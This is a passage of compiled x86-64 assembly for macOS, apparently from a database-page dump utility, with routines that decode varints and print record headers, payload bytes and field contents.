.cfi_def_cfa_register %rbp
movl $24272, %eax ## imm = 0x5ED0
callq ____chkstk_darwin
subq %rax, %rsp
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq %rax, -8(%rbp)
movq %rdi, -24088(%rbp)
movl %esi, -24092(%rbp)
movl %edx, -24096(%rbp)
movl %ecx, -24100(%rbp)
movl %r8d, -24104(%rbp)
movq -24088(%rbp), %rax
movslq -24104(%rbp), %rcx
addq %rcx, %rax
movq %rax, -24176(%rbp)
movq -24088(%rbp), %rax
movb (%rax), %al
movb %al, -24185(%rbp)
movl $0, -24192(%rbp)
movl -24096(%rbp), %esi
leaq L_.str.114(%rip), %rdi
movb $0, %al
callq _printf
movzbl -24185(%rbp), %eax
cmpl $5, %eax
jg LBB21_2
## %bb.1:
movq -24176(%rbp), %rax
movzbl (%rax), %eax
shll $8, %eax
movq -24176(%rbp), %rcx
movzbl 1(%rcx), %ecx
addl %ecx, %eax
shll $8, %eax
movq -24176(%rbp), %rcx
movzbl 2(%rcx), %ecx
addl %ecx, %eax
shll $8, %eax
movq -24176(%rbp), %rcx
movzbl 3(%rcx), %ecx
addl %ecx, %eax
movl %eax, -24116(%rbp)
movq -24088(%rbp), %rdi
movq -24176(%rbp), %rsi
movl $4, %edx
callq _printBytes
movl -24116(%rbp), %esi
leaq L_.str.115(%rip), %rdi
movb $0, %al
callq _printf
movq -24176(%rbp), %rax
addq $4, %rax
movq %rax, -24176(%rbp)
LBB21_2:
movzbl -24185(%rbp), %eax
cmpl $5, %eax
je LBB21_7
## %bb.3:
movq -24176(%rbp), %rdi
leaq -24136(%rbp), %rsi
callq _decodeVarint
movl %eax, -24108(%rbp)
movq -24088(%rbp), %rdi
movq -24176(%rbp), %rsi
movl -24108(%rbp), %edx
callq _printBytes
movq -24136(%rbp), %rdi
movsbl -24185(%rbp), %esi
callq _localPayload
movq %rax, -24168(%rbp)
movq -24168(%rbp), %rax
cmpq -24136(%rbp), %rax
jne LBB21_5
## %bb.4:
movq -24136(%rbp), %rsi
leaq L_.str.116(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB21_6
LBB21_5:
movq -24136(%rbp), %rsi
movq -24168(%rbp), %rdx
movq -24136(%rbp), %rcx
subq -24168(%rbp), %rcx
leaq L_.str.117(%rip), %rdi
movb $0, %al
callq _printf
LBB21_6:
movl -24108(%rbp), %ecx
movq -24176(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -24176(%rbp)
jmp LBB21_8
LBB21_7:
movq $0, -24168(%rbp)
movq $0, -24136(%rbp)
LBB21_8:
movq -24176(%rbp), %rax
addq -24168(%rbp), %rax
movq %rax, -24184(%rbp)
movzbl -24185(%rbp), %eax
cmpl $5, %eax
je LBB21_10
## %bb.9:
movzbl -24185(%rbp), %eax
cmpl $13, %eax
jne LBB21_11
LBB21_10:
movq -24176(%rbp), %rdi
leaq -24144(%rbp), %rsi
callq _decodeVarint
movl %eax, -24108(%rbp)
movq -24088(%rbp), %rdi
movq -24176(%rbp), %rsi
movl -24108(%rbp), %edx
callq _printBytes
movq -24144(%rbp), %rsi
leaq L_.str.118(%rip), %rdi
movb $0, %al
callq _printf
movl -24108(%rbp), %ecx
movq -24176(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -24176(%rbp)
LBB21_11:
cmpq $0, -24168(%rbp)
jle LBB21_70
## %bb.12:
movq -24176(%rbp), %rdi
leaq -24152(%rbp), %rsi
callq _decodeVarint
movl %eax, -24108(%rbp)
movq -24088(%rbp), %rdi
movq -24176(%rbp), %rsi
movl -24108(%rbp), %edx
callq _printBytes
movq -24152(%rbp), %rax
movl %eax, %esi
leaq L_.str.119(%rip), %rdi
movb $0, %al
callq _printf
movl -24108(%rbp), %eax
movl %eax, -24112(%rbp)
movl $0, -24192(%rbp)
movq -24152(%rbp), %rax
movq %rax, -24128(%rbp)
LBB21_13: ## =>This Inner Loop Header: Depth=1
movq -24176(%rbp), %rcx
movslq -24112(%rbp), %rax
addq %rax, %rcx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq -24184(%rbp), %rcx
movb %al, -24241(%rbp) ## 1-byte Spill
jae LBB21_15
## %bb.14: ## in Loop: Header=BB21_13 Depth=1
movslq -24112(%rbp), %rax
cmpq -24152(%rbp), %rax
setl %al
movb %al, -24241(%rbp) ## 1-byte Spill
LBB21_15: ## in Loop: Header=BB21_13 Depth=1
movb -24241(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB21_16
jmp LBB21_30
LBB21_16: ## in Loop: Header=BB21_13 Depth=1
movl $0, -24204(%rbp)
movq -24176(%rbp), %rdi
movslq -24112(%rbp), %rax
addq %rax, %rdi
leaq -24160(%rbp), %rsi
callq _decodeVarint
movl %eax, -24108(%rbp)
movq -24088(%rbp), %rdi
movq -24176(%rbp), %rsi
movslq -24112(%rbp), %rax
addq %rax, %rsi
movl -24108(%rbp), %edx
callq _printBytes
movl -24192(%rbp), %esi
movl -24160(%rbp), %edx
leaq L_.str.120(%rip), %rdi
xorl %eax, %eax
## kill: def $al killed $al killed $eax
callq _printf
movq -24160(%rbp), %rax
movq %rax, -24256(%rbp) ## 8-byte Spill
subq $11, %rax
ja LBB21_28
## %bb.77: ## in Loop: Header=BB21_13 Depth=1
movq -24256(%rbp), %rax ## 8-byte Reload
leaq LJTI21_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB21_17: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.121(%rip), %rax
movq %rax, -24200(%rbp)
movl $0, -24204(%rbp)
jmp LBB21_29
LBB21_18: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.122(%rip), %rax
movq %rax, -24200(%rbp)
movl $1, -24204(%rbp)
jmp LBB21_29
LBB21_19: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.123(%rip), %rax
movq %rax, -24200(%rbp)
movl $2, -24204(%rbp)
jmp LBB21_29
LBB21_20: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.124(%rip), %rax
movq %rax, -24200(%rbp)
movl $3, -24204(%rbp)
jmp LBB21_29
LBB21_21: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.125(%rip), %rax
movq %rax, -24200(%rbp)
movl $4, -24204(%rbp)
jmp LBB21_29
LBB21_22: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.126(%rip), %rax
movq %rax, -24200(%rbp)
movl $6, -24204(%rbp)
jmp LBB21_29
LBB21_23: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.127(%rip), %rax
movq %rax, -24200(%rbp)
movl $8, -24204(%rbp)
jmp LBB21_29
LBB21_24: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.128(%rip), %rax
movq %rax, -24200(%rbp)
movl $8, -24204(%rbp)
jmp LBB21_29
LBB21_25: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.129(%rip), %rax
movq %rax, -24200(%rbp)
movl $0, -24204(%rbp)
jmp LBB21_29
LBB21_26: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.130(%rip), %rax
movq %rax, -24200(%rbp)
movl $0, -24204(%rbp)
jmp LBB21_29
LBB21_27: ## in Loop: Header=BB21_13 Depth=1
leaq L_.str.131(%rip), %rax
movq %rax, -24200(%rbp)
movl $0, -24204(%rbp)
jmp LBB21_29
LBB21_28: ## in Loop: Header=BB21_13 Depth=1
movq -24160(%rbp), %rax
subq $12, %rax
## kill: def $eax killed $eax killed $rax
movl $2, %ecx
cltd
idivl %ecx
movl %eax, -24204(%rbp)
leaq -24048(%rbp), %rdi
movq -24160(%rbp), %rdx
andq $1, %rdx
leaq L_.str.133(%rip), %rcx
leaq L_.str.132(%rip), %rax
cmpq $0, %rdx
cmoveq %rax, %rcx
movl -24204(%rbp), %r8d
xorl %esi, %esi
movl $30, %edx
movb $0, %al
callq ___sprintf_chk
leaq -24048(%rbp), %rax
movq %rax, -24200(%rbp)
LBB21_29: ## in Loop: Header=BB21_13 Depth=1
movq -24200(%rbp), %rsi
leaq L_.str.134(%rip), %rdi
movb $0, %al
callq _printf
movl -24204(%rbp), %ecx
movslq -24192(%rbp), %rax
movl %ecx, -8016(%rbp,%rax,4)
movq -24128(%rbp), %rax
movl %eax, %ecx
movslq -24192(%rbp), %rax
movl %ecx, -16016(%rbp,%rax,4)
movq -24160(%rbp), %rax
movl %eax, %ecx
movslq -24192(%rbp), %rax
movl %ecx, -24016(%rbp,%rax,4)
movslq -24204(%rbp), %rax
addq -24128(%rbp), %rax
movq %rax, -24128(%rbp)
movl -24192(%rbp), %eax
addl $1, %eax
movl %eax, -24192(%rbp)
movl -24108(%rbp), %eax
addl -24112(%rbp), %eax
movl %eax, -24112(%rbp)
jmp LBB21_13
LBB21_30:
movl $0, -24108(%rbp)
LBB21_31: ## =>This Loop Header: Depth=1
## Child Loop BB21_38 Depth 2
## Child Loop BB21_47 Depth 2
## Child Loop BB21_54 Depth 2
movl -24108(%rbp), %ecx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl -24192(%rbp), %ecx
movb %al, -24257(%rbp) ## 1-byte Spill
jge LBB21_33
## %bb.32: ## in Loop: Header=BB21_31 Depth=1
movslq -24108(%rbp), %rax
movl -16016(%rbp,%rax,4), %eax
movslq -24108(%rbp), %rcx
addl -8016(%rbp,%rcx,4), %eax
cltq
cmpq -24168(%rbp), %rax
setle %al
movb %al, -24257(%rbp) ## 1-byte Spill
LBB21_33: ## in Loop: Header=BB21_31 Depth=1
movb -24257(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB21_34
jmp LBB21_69
LBB21_34: ## in Loop: Header=BB21_31 Depth=1
movslq -24108(%rbp), %rax
movl -16016(%rbp,%rax,4), %eax
movl %eax, -24208(%rbp)
movslq -24108(%rbp), %rax
cmpl $0, -8016(%rbp,%rax,4)
jne LBB21_36
## %bb.35: ## in Loop: Header=BB21_31 Depth=1
jmp LBB21_68
LBB21_36: ## in Loop: Header=BB21_31 Depth=1
movq -24088(%rbp), %rdi
movq -24176(%rbp), %rsi
movslq -24208(%rbp), %rax
addq %rax, %rsi
movslq -24108(%rbp), %rax
movl -8016(%rbp,%rax,4), %edx
callq _printBytes
movl -24108(%rbp), %esi
leaq L_.str.135(%rip), %rdi
movb $0, %al
callq _printf
movq -24176(%rbp), %rax
movslq -24208(%rbp), %rcx
addq %rcx, %rax
movq %rax, -24224(%rbp)
movslq -24108(%rbp), %rax
cmpl $7, -24016(%rbp,%rax,4)
jg LBB21_45
## %bb.37: ## in Loop: Header=BB21_31 Depth=1
movq -24224(%rbp), %rax
movsbq (%rax), %rax
movq %rax, -24216(%rbp)
movq $1, -24128(%rbp)
LBB21_38: ## Parent Loop BB21_31 Depth=1
## => This Inner Loop Header: Depth=2
movq -24128(%rbp), %rax
movslq -24108(%rbp), %rcx
movslq -8016(%rbp,%rcx,4), %rcx
cmpq %rcx, %rax
jge LBB21_41
## %bb.39: ## in Loop: Header=BB21_38 Depth=2
movq -24216(%rbp), %rax
shlq $8, %rax
movq -24224(%rbp), %rcx
movq -24128(%rbp), %rdx
movzbl (%rcx,%rdx), %ecx
## kill: def $rcx killed $ecx
addq %rcx, %rax
movq %rax, -24216(%rbp)
## %bb.40: ## in Loop: Header=BB21_38 Depth=2
movq -24128(%rbp), %rax
addq $1, %rax
movq %rax, -24128(%rbp)
jmp LBB21_38
LBB21_41: ## in Loop: Header=BB21_31 Depth=1
movslq -24108(%rbp), %rax
cmpl $7, -24016(%rbp,%rax,4)
jne LBB21_43
## %bb.42: ## in Loop: Header=BB21_31 Depth=1
movq -24216(%rbp), %rax
movq %rax, -24232(%rbp)
movsd -24232(%rbp), %xmm0 ## xmm0 = mem[0],zero
leaq L_.str.136(%rip), %rdi
movb $1, %al
callq _printf
jmp LBB21_44
LBB21_43: ## in Loop: Header=BB21_31 Depth=1
movq -24216(%rbp), %rsi
leaq L_.str.137(%rip), %rdi
movb $0, %al
callq _printf
LBB21_44: ## in Loop: Header=BB21_31 Depth=1
jmp LBB21_67
LBB21_45: ## in Loop: Header=BB21_31 Depth=1
movslq -24108(%rbp), %rax
movl -24016(%rbp,%rax,4), %eax
andl $1, %eax
cmpl $0, %eax
jne LBB21_53
## %bb.46: ## in Loop: Header=BB21_31 Depth=1
movb $120, -24080(%rbp)
movb $39, -24079(%rbp)
movl $2, -24236(%rbp)
movl $0, -24240(%rbp)
LBB21_47: ## Parent Loop BB21_31 Depth=1
## => This Inner Loop Header: Depth=2
movl -24240(%rbp), %ecx
movslq -24108(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl -8016(%rbp,%rdx,4), %ecx
movb %al, -24258(%rbp) ## 1-byte Spill
jge LBB21_49
## %bb.48: ## in Loop: Header=BB21_47 Depth=2
cmpl $24, -24236(%rbp)
setl %al
movb %al, -24258(%rbp) ## 1-byte Spill
LBB21_49: ## in Loop: Header=BB21_47 Depth=2
movb -24258(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB21_50
jmp LBB21_52
LBB21_50: ## in Loop: Header=BB21_47 Depth=2
leaq -24080(%rbp), %rdi
movslq -24236(%rbp), %rax
addq %rax, %rdi
movq -24224(%rbp), %rax
movslq -24240(%rbp), %rcx
movzbl (%rax,%rcx), %r8d
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.138(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
## %bb.51: ## in Loop: Header=BB21_47 Depth=2
movl -24240(%rbp), %eax
addl $1, %eax
movl %eax, -24240(%rbp)
movl -24236(%rbp), %eax
addl $2, %eax
movl %eax, -24236(%rbp)
jmp LBB21_47
LBB21_52: ## in Loop: Header=BB21_31 Depth=1
jmp LBB21_63
LBB21_53: ## in Loop: Header=BB21_31 Depth=1
movb $39, -24080(%rbp)
movl $1, -24236(%rbp)
movl $0, -24240(%rbp)
LBB21_54: ## Parent Loop BB21_31 Depth=1
## => This Inner Loop Header: Depth=2
movl -24240(%rbp), %ecx
movslq -24108(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpl -8016(%rbp,%rdx,4), %ecx
movb %al, -24259(%rbp) ## 1-byte Spill
jge LBB21_56
## %bb.55: ## in Loop: Header=BB21_54 Depth=2
cmpl $24, -24236(%rbp)
setl %al
movb %al, -24259(%rbp) ## 1-byte Spill
LBB21_56: ## in Loop: Header=BB21_54 Depth=2
movb -24259(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB21_57
jmp LBB21_62
LBB21_57: ## in Loop: Header=BB21_54 Depth=2
movq -24224(%rbp), %rax
movslq -24240(%rbp), %rcx
movzbl (%rax,%rcx), %edi
callq _isprint
cmpl $0, %eax
je LBB21_59
## %bb.58: ## in Loop: Header=BB21_54 Depth=2
movq -24224(%rbp), %rax
movslq -24240(%rbp), %rcx
movzbl (%rax,%rcx), %eax
movl %eax, -24264(%rbp) ## 4-byte Spill
jmp LBB21_60
LBB21_59: ## in Loop: Header=BB21_54 Depth=2
movl $46, %eax
movl %eax, -24264(%rbp) ## 4-byte Spill
jmp LBB21_60
LBB21_60: ## in Loop: Header=BB21_54 Depth=2
movl -24264(%rbp), %eax ## 4-byte Reload
movb %al, %cl
movslq -24236(%rbp), %rax
movb %cl, -24080(%rbp,%rax)
## %bb.61: ## in Loop: Header=BB21_54 Depth=2
movl -24240(%rbp), %eax
addl $1, %eax
movl %eax, -24240(%rbp)
movl -24236(%rbp), %eax
addl $1, %eax
movl %eax, -24236(%rbp)
jmp LBB21_54
LBB21_62: ## in Loop: Header=BB21_31 Depth=1
movslq -24236(%rbp), %rax
movb $0, -24080(%rbp,%rax)
LBB21_63: ## in Loop: Header=BB21_31 Depth=1
movl -24240(%rbp), %eax
movslq -24108(%rbp), %rcx
cmpl -8016(%rbp,%rcx,4), %eax
jge LBB21_65
## %bb.64: ## in Loop: Header=BB21_31 Depth=1
leaq -24080(%rbp), %rdi
movslq -24236(%rbp), %rax
addq %rax, %rdi
leaq L_.str.139(%rip), %rsi
movl $5, %edx
movq $-1, %rcx
callq ___memcpy_chk
jmp LBB21_66
LBB21_65: ## in Loop: Header=BB21_31 Depth=1
leaq -24080(%rbp), %rdi
movslq -24236(%rbp), %rax
addq %rax, %rdi
leaq L_.str.140(%rip), %rsi
movl $2, %edx
movq $-1, %rcx
callq ___memcpy_chk
LBB21_66: ## in Loop: Header=BB21_31 Depth=1
leaq -24080(%rbp), %rsi
leaq L_.str.134(%rip), %rdi
movb $0, %al
callq _printf
LBB21_67: ## in Loop: Header=BB21_31 Depth=1
movslq -24108(%rbp), %rax
movl -16016(%rbp,%rax,4), %eax
movslq -24108(%rbp), %rcx
addl -8016(%rbp,%rcx,4), %eax
movl %eax, -24112(%rbp)
LBB21_68: ## in Loop: Header=BB21_31 Depth=1
movl -24108(%rbp), %eax
addl $1, %eax
movl %eax, -24108(%rbp)
jmp LBB21_31
LBB21_69:
jmp LBB21_70
LBB21_70:
movslq -24112(%rbp), %rax
cmpq -24168(%rbp), %rax
jge LBB21_72
## %bb.71:
movq -24088(%rbp), %rdi
movq -24176(%rbp), %rsi
movslq -24112(%rbp), %rax
addq %rax, %rsi
xorl %edx, %edx
callq _printBytes
movq -24168(%rbp), %rsi
movslq -24112(%rbp), %rax
subq %rax, %rsi
leaq L_.str.141(%rip), %rdi
movb $0, %al
callq _printf
LBB21_72:
movq -24168(%rbp), %rax
cmpq -24136(%rbp), %rax
jge LBB21_74
## %bb.73:
movq -24088(%rbp), %rdi
movq -24176(%rbp), %rsi
addq -24168(%rbp), %rsi
movl $4, %edx
callq _printBytes
movq -24176(%rbp), %rdi
addq -24168(%rbp), %rdi
callq _decodeInt32
movl %eax, %esi
leaq L_.str.142(%rip), %rdi
movb $0, %al
callq _printf
LBB21_74:
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB21_76
## %bb.75:
addq $24272, %rsp ## imm = 0x5ED0
popq %rbp
retq
LBB21_76:
callq ___stack_chk_fail
ud2
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L21_0_set_17, LBB21_17-LJTI21_0
.set L21_0_set_18, LBB21_18-LJTI21_0
.set L21_0_set_19, LBB21_19-LJTI21_0
.set L21_0_set_20, LBB21_20-LJTI21_0
.set L21_0_set_21, LBB21_21-LJTI21_0
.set L21_0_set_22, LBB21_22-LJTI21_0
.set L21_0_set_23, LBB21_23-LJTI21_0
.set L21_0_set_24, LBB21_24-LJTI21_0
.set L21_0_set_25, LBB21_25-LJTI21_0
.set L21_0_set_26, LBB21_26-LJTI21_0
.set L21_0_set_27, LBB21_27-LJTI21_0
LJTI21_0:
.long L21_0_set_17
.long L21_0_set_18
.long L21_0_set_19
.long L21_0_set_20
.long L21_0_set_21
.long L21_0_set_22
.long L21_0_set_23
.long L21_0_set_24
.long L21_0_set_25
.long L21_0_set_26
.long L21_0_set_27
.long L21_0_set_27
.end_data_region
## -- End function
.p2align 4, 0x90 ## -- Begin function describeContent
_describeContent: ## @describeContent
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq $0, -32(%rbp)
movb $32, -81(%rbp)
movq -8(%rbp), %rax
addq -16(%rbp), %rax
movq %rax, -80(%rbp)
movq -8(%rbp), %rdi
leaq -56(%rbp), %rsi
callq _decodeVarint
movl %eax, -36(%rbp)
movq -8(%rbp), %rax
addq -56(%rbp), %rax
movq %rax, -72(%rbp)
movl -36(%rbp), %ecx
movq -8(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -8(%rbp)
movq -56(%rbp), %rax
movslq -36(%rbp), %rcx
subq %rcx, %rax
movq %rax, -48(%rbp)
LBB22_1: ## =>This Inner Loop Header: Depth=1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq $0, -48(%rbp)
movb %al, -97(%rbp) ## 1-byte Spill
jle LBB22_3
## %bb.2: ## in Loop: Header=BB22_1 Depth=1
movq -72(%rbp), %rax
cmpq -80(%rbp), %rax
setbe %al
movb %al, -97(%rbp) ## 1-byte Spill
LBB22_3: ## in Loop: Header=BB22_1 Depth=1
movb -97(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB22_4
jmp LBB22_32
LBB22_4: ## in Loop: Header=BB22_1 Depth=1
movq -8(%rbp), %rdi
leaq -56(%rbp), %rsi
callq _decodeVarint
movl %eax, -36(%rbp)
movl -36(%rbp), %ecx
movq -8(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -8(%rbp)
movslq -36(%rbp), %rcx
movq -48(%rbp), %rax
subq %rcx, %rax
movq %rax, -48(%rbp)
movslq -36(%rbp), %rcx
movq -16(%rbp), %rax
subq %rcx, %rax
movq %rax, -16(%rbp)
movb -81(%rbp), %cl
movq -24(%rbp), %rax
movb %cl, (%rax)
movb $44, -81(%rbp)
movq -32(%rbp), %rax
addq $1, %rax
movq %rax, -32(%rbp)
movq -24(%rbp), %rax
addq $1, %rax
movq %rax, -24(%rbp)
cmpq $0, -56(%rbp)
jne LBB22_6
## %bb.5: ## in Loop: Header=BB22_1 Depth=1
movq -24(%rbp), %rdi
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.107(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
jmp LBB22_31
LBB22_6: ## in Loop: Header=BB22_1 Depth=1
cmpq $1, -56(%rbp)
jl LBB22_15
## %bb.7: ## in Loop: Header=BB22_1 Depth=1
cmpq $6, -56(%rbp)
jg LBB22_15
## %bb.8: ## in Loop: Header=BB22_1 Depth=1
movq -72(%rbp), %rax
movsbq (%rax), %rax
movq %rax, -64(%rbp)
movq -72(%rbp), %rax
incq %rax
movq %rax, -72(%rbp)
movq -56(%rbp), %rax
addq $-2, %rax
movq %rax, -112(%rbp) ## 8-byte Spill
subq $4, %rax
ja LBB22_14
## %bb.33: ## in Loop: Header=BB22_1 Depth=1
movq -112(%rbp), %rax ## 8-byte Reload
leaq LJTI22_0(%rip), %rcx
movslq (%rcx,%rax,4), %rax
addq %rcx, %rax
jmpq *%rax
LBB22_9: ## in Loop: Header=BB22_1 Depth=1
movq -64(%rbp), %rax
shlq $16, %rax
movq -72(%rbp), %rcx
movzbl (%rcx), %ecx
shll $8, %ecx
movslq %ecx, %rcx
addq %rcx, %rax
movq -72(%rbp), %rcx
movzbl 1(%rcx), %ecx
## kill: def $rcx killed $ecx
addq %rcx, %rax
movq %rax, -64(%rbp)
movq -72(%rbp), %rax
addq $2, %rax
movq %rax, -72(%rbp)
LBB22_10: ## in Loop: Header=BB22_1 Depth=1
movq -64(%rbp), %rax
shlq $16, %rax
movq -72(%rbp), %rcx
movzbl (%rcx), %ecx
shll $8, %ecx
movslq %ecx, %rcx
addq %rcx, %rax
movq -72(%rbp), %rcx
movzbl 1(%rcx), %ecx
## kill: def $rcx killed $ecx
addq %rcx, %rax
movq %rax, -64(%rbp)
movq -72(%rbp), %rax
addq $2, %rax
movq %rax, -72(%rbp)
LBB22_11: ## in Loop: Header=BB22_1 Depth=1
movq -64(%rbp), %rax
shlq $8, %rax
movq -72(%rbp), %rcx
movzbl (%rcx), %ecx
## kill: def $rcx killed $ecx
addq %rcx, %rax
movq %rax, -64(%rbp)
movq -72(%rbp), %rax
addq $1, %rax
movq %rax, -72(%rbp)
LBB22_12: ## in Loop: Header=BB22_1 Depth=1
movq -64(%rbp), %rax
shlq $8, %rax
movq -72(%rbp), %rcx
movzbl (%rcx), %ecx
## kill: def $rcx killed $ecx
addq %rcx, %rax
movq %rax, -64(%rbp)
movq -72(%rbp), %rax
addq $1, %rax
movq %rax, -72(%rbp)
LBB22_13: ## in Loop: Header=BB22_1 Depth=1
movq -64(%rbp), %rax
shlq $8, %rax
movq -72(%rbp), %rcx
movzbl (%rcx), %ecx
## kill: def $rcx killed $ecx
addq %rcx, %rax
movq %rax, -64(%rbp)
movq -72(%rbp), %rax
addq $1, %rax
movq %rax, -72(%rbp)
LBB22_14: ## in Loop: Header=BB22_1 Depth=1
movq -24(%rbp), %rdi
movq -64(%rbp), %r8
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.108(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
jmp LBB22_30
LBB22_15: ## in Loop: Header=BB22_1 Depth=1
cmpq $7, -56(%rbp)
jne LBB22_17
## %bb.16: ## in Loop: Header=BB22_1 Depth=1
movq -24(%rbp), %rdi
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.109(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
movq -72(%rbp), %rax
addq $8, %rax
movq %rax, -72(%rbp)
jmp LBB22_29
LBB22_17: ## in Loop: Header=BB22_1 Depth=1
cmpq $8, -56(%rbp)
jne LBB22_19
## %bb.18: ## in Loop: Header=BB22_1 Depth=1
movq -24(%rbp), %rdi
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.110(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
jmp LBB22_28
LBB22_19: ## in Loop: Header=BB22_1 Depth=1
cmpq $9, -56(%rbp)
jne LBB22_21
## %bb.20: ## in Loop: Header=BB22_1 Depth=1
movq -24(%rbp), %rdi
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.111(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
jmp LBB22_27
LBB22_21: ## in Loop: Header=BB22_1 Depth=1
cmpq $12, -56(%rbp)
jl LBB22_26
## %bb.22: ## in Loop: Header=BB22_1 Depth=1
movq -56(%rbp), %rax
subq $12, %rax
movl $2, %ecx
cqto
idivq %rcx
movq %rax, -96(%rbp)
movq -56(%rbp), %rax
andq $1, %rax
cmpq $0, %rax
jne LBB22_24
## %bb.23: ## in Loop: Header=BB22_1 Depth=1
movq -24(%rbp), %rdi
movq -96(%rbp), %r8
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.112(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
jmp LBB22_25
LBB22_24: ## in Loop: Header=BB22_1 Depth=1
movq -24(%rbp), %rdi
movq -96(%rbp), %r8
xorl %esi, %esi
movq $-1, %rdx
leaq L_.str.113(%rip), %rcx
movb $0, %al
callq ___sprintf_chk
LBB22_25: ## in Loop: Header=BB22_1 Depth=1
movq -96(%rbp), %rax
addq -72(%rbp), %rax
movq %rax, -72(%rbp)
LBB22_26: ## in Loop: Header=BB22_1 Depth=1
jmp LBB22_27
LBB22_27: ## in Loop: Header=BB22_1 Depth=1
jmp LBB22_28
LBB22_28: ## in Loop: Header=BB22_1 Depth=1
jmp LBB22_29
LBB22_29: ## in Loop: Header=BB22_1 Depth=1
jmp LBB22_30
LBB22_30: ## in Loop: Header=BB22_1 Depth=1
jmp LBB22_31
LBB22_31: ## in Loop: Header=BB22_1 Depth=1
movq -24(%rbp), %rdi
callq _strlen
## kill: def $eax killed $eax killed $rax
movl %eax, -40(%rbp)
movl -40(%rbp), %ecx
movq -24(%rbp), %rax
movslq %ecx, %rcx
addq %rcx, %rax
movq %rax, -24(%rbp)
movslq -40(%rbp), %rax
addq -32(%rbp), %rax
movq %rax, -32(%rbp)
jmp LBB22_1
LBB22_32:
movq -32(%rbp), %rax
addq $112, %rsp
popq %rbp
retq
.cfi_endproc
.p2align 2, 0x90
.data_region jt32
.set L22_0_set_13, LBB22_13-LJTI22_0
.set L22_0_set_12, LBB22_12-LJTI22_0
.set L22_0_set_11, LBB22_11-LJTI22_0
.set L22_0_set_10, LBB22_10-LJTI22_0
.set L22_0_set_9, LBB22_9-LJTI22_0
LJTI22_0:
.long L22_0_set_13
.long L22_0_set_12
.long L22_0_set_11
.long L22_0_set_10
.long L22_0_set_9
.end_data_region
## -- End function
.p2align 4, 0x90 ## -- Begin function printBytes
_printBytes: ## @printBytes
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movl %edx, -20(%rbp)
movq -16(%rbp), %rax
movq -8(%rbp), %rcx
subq %rcx, %rax
movl %eax, %esi
leaq L_.str.13(%rip), %rdi
movb $0, %al
callq _printf
movl $0, -24(%rbp)
LBB23_1: ## =>This Inner Loop Header: Depth=1
cmpl $9, -24(%rbp)
jge LBB23_7
## %bb.2: ## in Loop: Header=BB23_1 Depth=1
movl -24(%rbp), %eax
cmpl -20(%rbp), %eax
jl LBB23_4
## %bb.3: ## in Loop: Header=BB23_1 Depth=1
leaq L_.str.18(%rip), %rdi
movb $0, %al
callq _printf
jmp LBB23_5
LBB23_4: ## in Loop: Header=BB23_1 Depth=1
movq -16(%rbp), %rax
movslq -24(%rbp), %rcx
movzbl (%rax,%rcx), %esi
leaq L_.str.19(%rip), %rdi
movb $0, %al
callq _printf
LBB23_5: ## in Loop: Header=BB23_1 Depth=1
jmp LBB23_6
LBB23_6: ## in Loop: Header=BB23_1 Depth=1
movl -24(%rbp), %eax
addl $1, %eax
movl %eax, -24(%rbp)
jmp LBB23_1
LBB23_7:
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.section __DATA,__data
.p2align 2 ## @db
_db:
.long 4294967295 ## 0xffffffff
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "%s: can't open %s\n"
.section __DATA,__data
.p2align 2 ## @pagesize
_pagesize:
.long 1024 ## 0x400
.section __TEXT,__cstring,cstring_literals
